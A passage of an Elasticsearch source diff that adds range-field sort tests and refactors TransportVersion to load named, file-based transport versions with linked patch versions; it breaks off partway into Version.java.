"type=long"), prepareCreate("index_integer").setMapping("foo", "type=integer"), @@ -2159,6 +2174,16 @@ public void testSortMixedFieldTypes() { prepareIndex("index_keyword").setId("1").setSource("foo", "123").get(); refresh(); + // for debugging, we try to see where the documents are located + try (RestClient restClient = createRestClient()) { + Request checkShardsRequest = new 
Request( + "GET", + "/_cat/shards/index_long,index_double,index_keyword?format=json&h=index,node,shard,prirep,state,docs,index" + ); + Response response = restClient.performRequest(checkShardsRequest); + logger.info("FieldSortIT#testSortMixedFieldTypes document distribution: " + EntityUtils.toString(response.getEntity())); + } + { // mixing long and integer types is ok, as we convert integer sort to long sort assertNoFailures(prepareSearch("index_long", "index_integer").addSort(new FieldSortBuilder("foo")).setSize(10)); } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/sort/RangeFieldSortIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/sort/RangeFieldSortIT.java new file mode 100644 index 0000000000000..8f3dea78b73e9 --- /dev/null +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/sort/RangeFieldSortIT.java @@ -0,0 +1,107 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.search.sort; + +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.index.mapper.RangeType; +import org.elasticsearch.rest.RestStatus; +import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.XContentFactory; + +import static org.elasticsearch.index.query.QueryBuilders.matchAllQuery; +import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertFailures; +import static org.hamcrest.Matchers.containsString; + +public class RangeFieldSortIT extends ESSingleNodeTestCase { + + private static final String FIELD_NAME = "range"; + + public void testSortingOnIntegerRangeFieldThrows400() throws Exception { + String indexName = "int_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.INTEGER.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnLongRangeFieldThrows400() throws Exception { + String indexName = "long_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.LONG.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnFloatRangeFieldThrows400() throws Exception { + String indexName = "float_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.FLOAT.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnDoubleRangeFieldThrows400() throws Exception { + String indexName = "double_range_index"; + createIndex(indexName, FIELD_NAME, 
RangeType.DOUBLE.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnIpRangeFieldThrows400() throws Exception { + String indexName = "ip_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.IP.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnDateRangeFieldThrows400() throws Exception { + String indexName = "date_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.DATE.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + private void createIndex(String indexName, String rangeFieldName, String rangeFieldType) throws Exception { + int numShards = randomIntBetween(1, 3); + client().admin() + .indices() + .prepareCreate(indexName) + .setSettings(Settings.builder().put("index.number_of_shards", numShards)) + .setMapping(createMapping(rangeFieldName, rangeFieldType)) + .get(); + } + + private XContentBuilder createMapping(String fieldName, String fieldType) throws Exception { + return XContentFactory.jsonBuilder() + .startObject() + .startObject("properties") + .startObject(fieldName) + .field("type", fieldType) + .endObject() + .endObject() + .endObject(); + } +} diff --git a/server/src/internalClusterTest/java/org/elasticsearch/snapshots/DedicatedClusterSnapshotRestoreIT.java b/server/src/internalClusterTest/java/org/elasticsearch/snapshots/DedicatedClusterSnapshotRestoreIT.java index e0bfab595a318..fa2b47fda03a9 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/snapshots/DedicatedClusterSnapshotRestoreIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/snapshots/DedicatedClusterSnapshotRestoreIT.java @@ -1077,7 +1077,6 @@ public void onRequestSent( final ActionFuture deleteResponse = startDeleteSnapshot(repoName, snapshotName); awaitClusterState( - logger, otherDataNode, state -> SnapshotsInProgress.get(state) .forRepo(repoName) diff --git a/server/src/internalClusterTest/java/org/elasticsearch/snapshots/MultiClusterRepoAccessIT.java b/server/src/internalClusterTest/java/org/elasticsearch/snapshots/MultiClusterRepoAccessIT.java index c1549c1f3d384..875052ce3998c 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/snapshots/MultiClusterRepoAccessIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/snapshots/MultiClusterRepoAccessIT.java @@ -77,7 +77,8 @@ public Path nodeConfigPath(int nodeOrdinal) { InternalSettingsPlugin.class, getTestTransportPlugin() ), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); secondCluster.beforeTest(random()); } diff --git a/server/src/main/java/module-info.java b/server/src/main/java/module-info.java index e6a44a0fba7a4..66811ab3ce44b 100644 --- a/server/src/main/java/module-info.java +++ b/server/src/main/java/module-info.java @@ -429,6 +429,7 @@ org.elasticsearch.index.mapper.MapperFeatures, 
org.elasticsearch.index.IndexFeatures, org.elasticsearch.search.SearchFeatures, + org.elasticsearch.synonyms.SynonymFeatures, org.elasticsearch.script.ScriptFeatures, org.elasticsearch.search.retriever.RetrieversFeatures, org.elasticsearch.action.admin.cluster.stats.ClusterStatsFeatures; diff --git a/server/src/main/java/org/elasticsearch/ElasticsearchException.java b/server/src/main/java/org/elasticsearch/ElasticsearchException.java index 7b229c1f979ae..5948607cbd0b7 100644 --- a/server/src/main/java/org/elasticsearch/ElasticsearchException.java +++ b/server/src/main/java/org/elasticsearch/ElasticsearchException.java @@ -85,7 +85,7 @@ */ public class ElasticsearchException extends RuntimeException implements ToXContentFragment, Writeable { - private static final TransportVersion UNKNOWN_VERSION_ADDED = TransportVersions.ZERO; + private static final TransportVersion UNKNOWN_VERSION_ADDED = TransportVersion.zero(); /** * Passed in the {@link Params} of {@link #generateThrowableXContent(XContentBuilder, Params, Throwable)} diff --git a/server/src/main/java/org/elasticsearch/TransportVersion.java b/server/src/main/java/org/elasticsearch/TransportVersion.java index f1e20ac4bb77e..bdef45eff2696 100644 --- a/server/src/main/java/org/elasticsearch/TransportVersion.java +++ b/server/src/main/java/org/elasticsearch/TransportVersion.java @@ -15,19 +15,34 @@ import org.elasticsearch.internal.VersionExtension; import org.elasticsearch.plugins.ExtensionLoader; +import java.io.BufferedReader; import java.io.IOException; +import java.io.InputStream; +import java.io.InputStreamReader; +import java.io.UncheckedIOException; +import java.nio.charset.StandardCharsets; +import java.util.ArrayList; import java.util.Collection; import java.util.Collections; import java.util.List; import java.util.Map; +import java.util.Objects; import java.util.ServiceLoader; import java.util.function.Function; +import java.util.function.IntFunction; import java.util.stream.Collectors; -import java.util.stream.Stream; /** * Represents the version of the wire protocol used to communicate between a pair of ES nodes. *

+ * Note: We are currently transitioning to a file-based system to load and maintain transport versions. These file-based transport + * versions are named and are referred to as named transport versions. Named transport versions also maintain a linked list of their + * own patch versions to simplify transport version compatibility checks. Transport versions that continue to be loaded through + * {@link TransportVersions} are referred to as unnamed transport versions. Unnamed transport versions will continue to be used + * over the wire, since only the id is needed for compatibility checks, even against named transport versions. There are changes + * throughout {@link TransportVersion} that exist solely to support this transition. For now, continue to use the existing system of adding unnamed + * transport versions to {@link TransportVersions}. + *
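For illustration, a minimal sketch of the new scheme (not part of this patch; the resource path, feature name, and ids are hypothetical, inferred from the CSV parsing code added further down in this file):

    // Hypothetical resource: transport/definitions/referable/example_feature.csv
    // containing the single line "9112001,8841063" (ids newest-first, strictly descending).
    // Loading it would produce a named transport version whose older patch ids are
    // reachable through the linked list described above:
    TransportVersion example = TransportVersion.fromName("example_feature"); // assuming the definition was loaded
    for (TransportVersion patch = example.nextPatchVersion(); patch != null; patch = patch.nextPatchVersion()) {
        // each iteration visits an older patch id of the same named version
    }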

* Prior to 8.8.0, the release {@link Version} was used everywhere. This class separates the wire protocol version from the release version. *

* Each transport version constant has an id number, which for versions prior to 8.9.0 is the same as the release version for backwards @@ -41,12 +56,12 @@ * those two merged commits. * *
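As a worked example of this id layout (a hedged aside; the concrete ids are illustrative, and the patch-window arithmetic comes from the isPatchFrom method further down in this file):

    // isPatchFrom(v) accepts ids in [v.id, v.id + 100 - v.id % 100), i.e. ids that
    // differ from v only in the trailing two (patch) digits:
    TransportVersion base = TransportVersion.fromId(8_841_0_61);              // 8841061
    boolean patch = TransportVersion.fromId(8_841_0_99).isPatchFrom(base);    // true:  8841099 < 8841100
    boolean notPatch = TransportVersion.fromId(8_842_0_00).isPatchFrom(base); // false: 8842000 >= 8841100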

<h2>Version compatibility</h2>

- * The earliest compatible version is hardcoded in the {@link TransportVersions#MINIMUM_COMPATIBLE} field. Previously, this was dynamically + * The earliest compatible version is hardcoded in the {@link VersionsHolder#MINIMUM_COMPATIBLE} field. Previously, this was dynamically * calculated from the major/minor versions of {@link Version}, but {@code TransportVersion} does not have separate major/minor version * numbers. So the minimum compatible version is hard-coded as the transport version used by the highest minor release of the previous - * major version. {@link TransportVersions#MINIMUM_COMPATIBLE} should be updated appropriately whenever a major release happens. + * major version. {@link VersionsHolder#MINIMUM_COMPATIBLE} should be updated appropriately whenever a major release happens. *

- * The earliest CCS compatible version is hardcoded at {@link TransportVersions#MINIMUM_CCS_VERSION}, as the transport version used by the + * The earliest CCS compatible version is hardcoded at {@link VersionsHolder#MINIMUM_CCS_VERSION}, as the transport version used by the * previous minor release. This should be updated appropriately whenever a minor release happens. * *
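A short sketch of how these two bounds are consumed, using the accessors this patch introduces (the peer's version id is illustrative only):

    TransportVersion remote = TransportVersion.fromId(9_000_0_13);             // e.g. a 9.0.4 peer
    boolean wireCompatible = TransportVersion.isCompatible(remote);            // remote.onOrAfter(minimumCompatible())
    boolean ccsUsable = remote.onOrAfter(TransportVersion.minimumCCSVersion());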

<h2>Scope of usefulness of {@link TransportVersion}</h2>

@@ -57,7 +72,138 @@ * different version value. If you need to know whether the cluster as a whole speaks a new enough {@link TransportVersion} to understand a * newly-added feature, use {@link org.elasticsearch.cluster.ClusterState#getMinTransportVersion}. */ -public record TransportVersion(int id) implements VersionId { +public record TransportVersion(String name, int id, TransportVersion nextPatchVersion) implements VersionId { + + /** + * Constructs an unnamed transport version. + */ + public TransportVersion(int id) { + this(null, id, null); + } + + interface BufferedReaderParser { + T parse(String component, String path, BufferedReader bufferedReader); + } + + static T parseFromBufferedReader( + String component, + String path, + Function nameToStream, + BufferedReaderParser parser + ) { + try (InputStream inputStream = nameToStream.apply(path)) { + if (inputStream == null) { + return null; + } + try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream, StandardCharsets.UTF_8))) { + return parser.parse(component, path, bufferedReader); + } + } catch (IOException ioe) { + throw new UncheckedIOException("parsing error [" + component + ":" + path + "]", ioe); + } + } + + /** + * Constructs a named transport version along with its set of compatible patch versions from x-content. + * This method takes in the parameter {@code upperBound} which is the highest transport version id + * that will be loaded by this node. + */ + public static TransportVersion fromBufferedReader( + String component, + String path, + boolean nameInFile, + boolean isNamed, + BufferedReader bufferedReader, + Integer upperBound + ) { + try { + String line = bufferedReader.readLine(); + String[] parts = line.replaceAll("\\s+", "").split(","); + String check; + while ((check = bufferedReader.readLine()) != null) { + if (check.replaceAll("\\s+", "").isEmpty() == false) { + throw new IllegalArgumentException("invalid transport version file format [" + toComponentPath(component, path) + "]"); + } + } + if (parts.length < (nameInFile ? 2 : 1)) { + throw new IllegalStateException("invalid transport version file format [" + toComponentPath(component, path) + "]"); + } + String name = null; + if (isNamed) { + if (nameInFile) { + name = parts[0]; + } else { + name = path.substring(path.lastIndexOf('/') + 1, path.length() - 4); + } + } + List ids = new ArrayList<>(); + for (int i = nameInFile ? 
1 : 0; i < parts.length; ++i) { + try { + ids.add(Integer.parseInt(parts[i])); + } catch (NumberFormatException nfe) { + throw new IllegalStateException( + "invalid transport version file format [" + toComponentPath(component, path) + "]", + nfe + ); + } + } + TransportVersion transportVersion = null; + for (int idIndex = ids.size() - 1; idIndex >= 0; --idIndex) { + if (idIndex > 0 && ids.get(idIndex - 1) <= ids.get(idIndex)) { + throw new IllegalStateException("invalid transport version file format [" + toComponentPath(component, path) + "]"); + } + if (ids.get(idIndex) > upperBound) { + break; + } + transportVersion = new TransportVersion(name, ids.get(idIndex), transportVersion); + } + return transportVersion; + } catch (IOException ioe) { + throw new UncheckedIOException("invalid transport version file format [" + toComponentPath(component, path) + "]", ioe); + } + } + + public static List collectFromInputStreams( + String component, + String resourceRoot, + Function resourceLoader, + String upperBoundFileName + ) { + TransportVersion upperBound = parseFromBufferedReader( + component, + resourceRoot + "/upper_bounds/" + upperBoundFileName, + resourceLoader, + (c, p, br) -> fromBufferedReader(c, p, true, false, br, Integer.MAX_VALUE) + ); + if (upperBound != null) { + List versionRelativePaths = parseFromBufferedReader( + component, + resourceRoot + "/definitions/manifest.txt", + resourceLoader, + (c, p, br) -> br.lines().filter(line -> line.isBlank() == false).toList() + ); + if (versionRelativePaths != null) { + List transportVersions = new ArrayList<>(); + for (String versionRelativePath : versionRelativePaths) { + TransportVersion transportVersion = parseFromBufferedReader( + component, + resourceRoot + "/definitions/" + versionRelativePath, + resourceLoader, + (c, p, br) -> fromBufferedReader(c, p, false, versionRelativePath.startsWith("referable/"), br, upperBound.id()) + ); + if (transportVersion != null) { + transportVersions.add(transportVersion); + } + } + return transportVersions; + } + } + return List.of(); + } + + private static String toComponentPath(String component, String path) { + return component + ":" + path; + } public static TransportVersion readVersion(StreamInput in) throws IOException { return fromId(in.readVInt()); @@ -70,7 +216,7 @@ public static TransportVersion readVersion(StreamInput in) throws IOException { * The new instance is not registered in {@code TransportVersion.getAllVersions}. */ public static TransportVersion fromId(int id) { - TransportVersion known = VersionsHolder.ALL_VERSIONS_MAP.get(id); + TransportVersion known = VersionsHolder.ALL_VERSIONS_BY_ID.get(id); if (known != null) { return known; } @@ -78,6 +224,23 @@ public static TransportVersion fromId(int id) { return new TransportVersion(id); } + /** + * Finds a {@link TransportVersion} by its name. The parameter {@code name} must be a {@link String} + * direct value or validation checks will fail. {@code TransportVersion.fromName("direct_value")}. + *

+ * This will only return the latest known referable transport version for a given name and not its + * patch versions. Patch versions are constructed as a linked list internally and may be found by + * cycling through them in a loop using {@link TransportVersion#nextPatchVersion()}. + * + */ + public static TransportVersion fromName(String name) { + TransportVersion known = VersionsHolder.ALL_VERSIONS_BY_NAME.get(name); + if (known == null) { + throw new IllegalStateException("unknown transport version [" + name + "]"); + } + return known; + } + public static void writeVersion(TransportVersion version, StreamOutput out) throws IOException { out.writeVInt(version.id); } @@ -100,7 +263,7 @@ public static TransportVersion max(TransportVersion version1, TransportVersion v * Returns {@code true} if the specified version is compatible with this running version of Elasticsearch. */ public static boolean isCompatible(TransportVersion version) { - return version.onOrAfter(TransportVersions.MINIMUM_COMPATIBLE); + return version.onOrAfter(VersionsHolder.MINIMUM_COMPATIBLE); } /** @@ -111,6 +274,29 @@ public static TransportVersion current() { return VersionsHolder.CURRENT; } + /** + * Sentinel value for lowest possible transport version + */ + public static TransportVersion zero() { + return VersionsHolder.ZERO; + } + + /** + * Reference to the earliest compatible transport version to this version of the codebase. + * This should be the transport version used by the highest minor version of the previous major. + */ + public static TransportVersion minimumCompatible() { + return VersionsHolder.MINIMUM_COMPATIBLE; + } + + /** + * Reference to the minimum transport version that can be used with CCS. + * This should be the transport version used by the previous minor release. + */ + public static TransportVersion minimumCCSVersion() { + return VersionsHolder.MINIMUM_CCS_VERSION; + } + /** * Sorted list of all defined transport versions */ @@ -123,19 +309,19 @@ public static List getAllVersions() { * in the wild (they're sent over the wire by numeric ID) but we don't know how to communicate using such versions. */ public boolean isKnown() { - return VersionsHolder.ALL_VERSIONS_MAP.containsKey(id); + return VersionsHolder.ALL_VERSIONS_BY_ID.containsKey(id); } /** - * @return the newest known {@link TransportVersion} which is no older than this instance. Returns {@link TransportVersions#ZERO} if + * @return the newest known {@link TransportVersion} which is no older than this instance. Returns {@link VersionsHolder#ZERO} if * there are no such versions. */ public TransportVersion bestKnownVersion() { if (isKnown()) { return this; } - TransportVersion bestSoFar = TransportVersions.ZERO; - for (final var knownVersion : VersionsHolder.ALL_VERSIONS_MAP.values()) { + TransportVersion bestSoFar = VersionsHolder.ZERO; + for (final var knownVersion : VersionsHolder.ALL_VERSIONS_BY_ID.values()) { if (knownVersion.after(bestSoFar) && knownVersion.before(this)) { bestSoFar = knownVersion; } @@ -171,12 +357,75 @@ public boolean isPatchFrom(TransportVersion version) { return onOrAfter(version) && id < version.id + 100 - (version.id % 100); } + /** + * Supports is used to determine if a named transport version is supported + * by a caller transport version. This will check both the latest id + * and all of its patch ids for compatibility. 
This replaces the pattern + * of {@code wireTV.onOrAfter(TV_FEATURE) || wireTV.isPatchFrom(TV_FEATURE_BACKPORT) || ...} + * for unnamed transport versions with {@code wireTV.supports(TV_FEATURE)} for named + * transport versions (since referable versions know about their own patch versions). + *

+ * The recommended use of this method is to declare a static final {@link TransportVersion} + * in the file where it is used. This constant is then used in conjunction with + * this method to check transport version compatibility. + *

+ * An example: + * {@code + * public class ExampleClass { + * ... + * TransportVersion TV_FEATURE = TransportVersion.fromName("tv_feature"); + * ... + * public static ExampleClass readFrom(InputStream in) { + * ... + * if (in.getTransportVersion().supports(TV_FEATURE)) { + * // read newer values + * } + * ... + * } + * ... + * public void writeTo(OutputStream out) { + * ... + * if (out.getTransportVersion().supports(TV_FEATURE)) { + * // write newer values + * } + * ... + * } + * ... + * } + * } + */ + public boolean supports(TransportVersion version) { + if (onOrAfter(version)) { + return true; + } + TransportVersion nextPatchVersion = version.nextPatchVersion; + while (nextPatchVersion != null) { + if (isPatchFrom(nextPatchVersion)) { + return true; + } + nextPatchVersion = nextPatchVersion.nextPatchVersion; + } + return false; + } + /** * Returns a string representing the Elasticsearch release version of this transport version, * if applicable for this deployment, otherwise the raw version number. */ public String toReleaseVersion() { - return TransportVersions.VERSION_LOOKUP.apply(id); + return VersionsHolder.VERSION_LOOKUP_BY_RELEASE.apply(id); + } + + @Override + public boolean equals(Object o) { + if (o == null || getClass() != o.getClass()) return false; + TransportVersion that = (TransportVersion) o; + return id == that.id; + } + + @Override + public int hashCode() { + return Objects.hashCode(id); } @Override @@ -184,25 +433,86 @@ public String toString() { return Integer.toString(id); } + /** + * This class holds various data structures for loading transport versions, both + * named file-based definitions and unnamed. While we transition to file-based transport versions, this class will + * load and merge unnamed transport versions from {@link TransportVersions} along with + * transport version definitions specified in a manifest file in resources. + */ private static class VersionsHolder { + private static final List<TransportVersion> ALL_VERSIONS; - private static final Map<Integer, TransportVersion> ALL_VERSIONS_MAP; + private static final Map<Integer, TransportVersion> ALL_VERSIONS_BY_ID; + private static final Map<String, TransportVersion> ALL_VERSIONS_BY_NAME; + private static final IntFunction<String> VERSION_LOOKUP_BY_RELEASE; + + private static final TransportVersion CURRENT; + private static final TransportVersion ZERO; + private static final TransportVersion MINIMUM_COMPATIBLE; + private static final TransportVersion MINIMUM_CCS_VERSION; static { + // collect all the transport versions from server and es modules/plugins (defined in server) + List<TransportVersion> allVersions = new ArrayList<>(TransportVersions.DEFINED_VERSIONS); + List<TransportVersion> streamVersions = collectFromInputStreams( + "", + "/transport", + TransportVersion.class::getResourceAsStream, + Version.CURRENT.major + "."
+ Version.CURRENT.minor + ".csv" + ); + Map<String, TransportVersion> allVersionsByName = streamVersions.stream() + .filter(tv -> tv.name() != null) + .collect(Collectors.toMap(TransportVersion::name, v -> v)); + addTransportVersions(streamVersions, allVersions).sort(TransportVersion::compareTo); + + // set version lookup by release before adding serverless versions + // serverless versions should not affect release version + VERSION_LOOKUP_BY_RELEASE = ReleaseVersions.generateVersionsLookup( + TransportVersions.class, + allVersions.get(allVersions.size() - 1).id() + ); + + // collect all the transport versions from serverless Collection<TransportVersion> extendedVersions = ExtensionLoader.loadSingleton(ServiceLoader.load(VersionExtension.class)) .map(VersionExtension::getTransportVersions) .orElse(Collections.emptyList()); - - if (extendedVersions.isEmpty()) { - ALL_VERSIONS = TransportVersions.DEFINED_VERSIONS; - } else { - ALL_VERSIONS = Stream.concat(TransportVersions.DEFINED_VERSIONS.stream(), extendedVersions.stream()).sorted().toList(); + addTransportVersions(extendedVersions, allVersions).sort(TransportVersion::compareTo); + for (TransportVersion version : extendedVersions) { + if (version.name() != null) { + allVersionsByName.put(version.name(), version); + } } - ALL_VERSIONS_MAP = ALL_VERSIONS.stream().collect(Collectors.toUnmodifiableMap(TransportVersion::id, Function.identity())); + // set the transport version lookups + ALL_VERSIONS = Collections.unmodifiableList(allVersions); + ALL_VERSIONS_BY_ID = ALL_VERSIONS.stream().collect(Collectors.toUnmodifiableMap(TransportVersion::id, Function.identity())); + ALL_VERSIONS_BY_NAME = Collections.unmodifiableMap(allVersionsByName); CURRENT = ALL_VERSIONS.getLast(); + ZERO = new TransportVersion(0); + MINIMUM_COMPATIBLE = loadConstant("minimum_compatible"); + MINIMUM_CCS_VERSION = loadConstant("minimum_ccs_version"); + } + + private static TransportVersion loadConstant(String name) { + return parseFromBufferedReader( + "", + "/transport/constants/" + name + ".csv", + TransportVersion.class::getResourceAsStream, + (c, p, br) -> fromBufferedReader(c, p, false, false, br, Integer.MAX_VALUE) + ); + } + + private static List<TransportVersion> addTransportVersions(Collection<TransportVersion> addFrom, List<TransportVersion> addTo) { + for (TransportVersion transportVersion : addFrom) { + addTo.add(transportVersion); + TransportVersion patchVersion = transportVersion.nextPatchVersion(); + while (patchVersion != null) { + addTo.add(patchVersion); + patchVersion = patchVersion.nextPatchVersion(); + } + } + return addTo; + } } } diff --git a/server/src/main/java/org/elasticsearch/TransportVersions.java b/server/src/main/java/org/elasticsearch/TransportVersions.java index 07bf5e3d50267..351b6dbce1f4a 100644 --- a/server/src/main/java/org/elasticsearch/TransportVersions.java +++ b/server/src/main/java/org/elasticsearch/TransportVersions.java @@ -17,9 +17,7 @@ import java.util.HashMap; import java.util.List; import java.util.Map; -import java.util.Set; import java.util.TreeSet; -import java.util.function.IntFunction; /** *

Transport version is used to coordinate compatible wire protocol communication between nodes, at a fine-grained level. This replaces @@ -49,7 +47,6 @@ static TransportVersion def(int id) { } // TODO: ES-10337 we can remove all transport versions earlier than 8.18 - public static final TransportVersion ZERO = def(0); public static final TransportVersion V_7_0_0 = def(7_00_00_99); public static final TransportVersion V_7_1_0 = def(7_01_00_99); public static final TransportVersion V_7_2_0 = def(7_02_00_99); @@ -99,6 +96,8 @@ static TransportVersion def(int id) { public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_7 = def(8_797_0_07); public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_8 = def(8_797_0_08); public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_9 = def(8_797_0_09); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_10 = def(8_797_0_10); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_11 = def(8_797_0_11); public static final TransportVersion INDEXING_PRESSURE_THROTTLING_STATS = def(8_798_0_00); public static final TransportVersion REINDEX_DATA_STREAMS = def(8_799_0_00); public static final TransportVersion ESQL_REMOVE_NODE_LEVEL_PLAN = def(8_800_0_00); @@ -148,6 +147,7 @@ static TransportVersion def(int id) { public static final TransportVersion INITIAL_ELASTICSEARCH_8_18_2 = def(8_840_0_04); public static final TransportVersion INITIAL_ELASTICSEARCH_8_18_3 = def(8_840_0_05); public static final TransportVersion INITIAL_ELASTICSEARCH_8_18_4 = def(8_840_0_06); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_18_7 = def(8_840_0_09); public static final TransportVersion INITIAL_ELASTICSEARCH_8_19 = def(8_841_0_00); public static final TransportVersion COHERE_BIT_EMBEDDING_TYPE_SUPPORT_ADDED_BACKPORT_8_X = def(8_841_0_01); public static final TransportVersion REMOVE_ALL_APPLICABLE_SELECTOR_BACKPORT_8_19 = def(8_841_0_02); @@ -209,11 +209,18 @@ static TransportVersion def(int id) { public static final TransportVersion ML_INFERENCE_ELASTIC_DENSE_TEXT_EMBEDDINGS_ADDED_8_19 = def(8_841_0_59); public static final TransportVersion ML_INFERENCE_COHERE_API_VERSION_8_19 = def(8_841_0_60); public static final TransportVersion ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19 = def(8_841_0_61); + public static final TransportVersion ESQL_PROFILE_INCLUDE_PLAN_8_19 = def(8_841_0_62); + public static final TransportVersion ESQL_SPLIT_ON_BIG_VALUES_8_19 = def(8_841_0_63); + public static final TransportVersion ESQL_FIXED_INDEX_LIKE_8_19 = def(8_841_0_64); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_19_1 = def(8_841_0_65); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_19_2 = def(8_841_0_66); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_19_4 = def(8_841_0_68); public static final TransportVersion V_9_0_0 = def(9_000_0_09); public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_1 = def(9_000_0_10); public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_2 = def(9_000_0_11); public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_3 = def(9_000_0_12); public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_4 = def(9_000_0_13); + public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_7 = def(9_000_0_16); public static final TransportVersion COHERE_BIT_EMBEDDING_TYPE_SUPPORT_ADDED = def(9_001_0_00); public static final TransportVersion REMOVE_SNAPSHOT_FAILURES = def(9_002_0_00); public static final TransportVersion 
TRANSPORT_STATS_HANDLING_TIME_REQUIRED = def(9_003_0_00); @@ -325,6 +332,12 @@ static TransportVersion def(int id) { public static final TransportVersion ML_INFERENCE_COHERE_API_VERSION = def(9_110_0_00); public static final TransportVersion ESQL_PROFILE_INCLUDE_PLAN = def(9_111_0_00); public static final TransportVersion MAPPINGS_IN_DATA_STREAMS = def(9_112_0_00); + public static final TransportVersion ESQL_SPLIT_ON_BIG_VALUES_9_1 = def(9_112_0_01); + public static final TransportVersion ESQL_FIXED_INDEX_LIKE_9_1 = def(9_112_0_02); + public static final TransportVersion ESQL_SAMPLE_OPERATOR_STATUS_9_1 = def(9_112_0_03); + public static final TransportVersion INITIAL_ELASTICSEARCH_9_1_1 = def(9_112_0_04); + public static final TransportVersion INITIAL_ELASTICSEARCH_9_1_2 = def(9_112_0_05); + public static final TransportVersion INITIAL_ELASTICSEARCH_9_1_4 = def(9_112_0_07); /* * STOP! READ THIS FIRST! No, really, @@ -381,45 +394,18 @@ static TransportVersion def(int id) { * In branches 8.7-8.10 see server/src/main/java/org/elasticsearch/TransportVersion.java for the equivalent definitions. */ - /** - * Reference to the earliest compatible transport version to this version of the codebase. - * This should be the transport version used by the highest minor version of the previous major. - */ - public static final TransportVersion MINIMUM_COMPATIBLE = INITIAL_ELASTICSEARCH_8_19; - - /** - * Reference to the minimum transport version that can be used with CCS. - * This should be the transport version used by the previous minor release. - */ - public static final TransportVersion MINIMUM_CCS_VERSION = INITIAL_ELASTICSEARCH_9_0_3; - /** * Sorted list of all versions defined in this class */ static final List DEFINED_VERSIONS = collectAllVersionIdsDefinedInClass(TransportVersions.class); - // the highest transport version constant defined - static final TransportVersion LATEST_DEFINED; - static { - LATEST_DEFINED = DEFINED_VERSIONS.getLast(); - - // see comment on IDS field - // now we're registered all the transport versions, we can clear the map - IDS = null; - } - public static List collectAllVersionIdsDefinedInClass(Class cls) { Map versionIdFields = new HashMap<>(); List definedTransportVersions = new ArrayList<>(); - Set ignore = Set.of("ZERO", "CURRENT", "MINIMUM_COMPATIBLE", "MINIMUM_CCS_VERSION"); - for (Field declaredField : cls.getFields()) { if (declaredField.getType().equals(TransportVersion.class)) { String fieldName = declaredField.getName(); - if (ignore.contains(fieldName)) { - continue; - } TransportVersion version; try { @@ -449,8 +435,6 @@ public static List collectAllVersionIdsDefinedInClass(Class return List.copyOf(definedTransportVersions); } - static final IntFunction VERSION_LOOKUP = ReleaseVersions.generateVersionsLookup(TransportVersions.class, LATEST_DEFINED.id()); - // no instance private TransportVersions() {} } diff --git a/server/src/main/java/org/elasticsearch/Version.java b/server/src/main/java/org/elasticsearch/Version.java index 925370623a888..af7bad06f564e 100644 --- 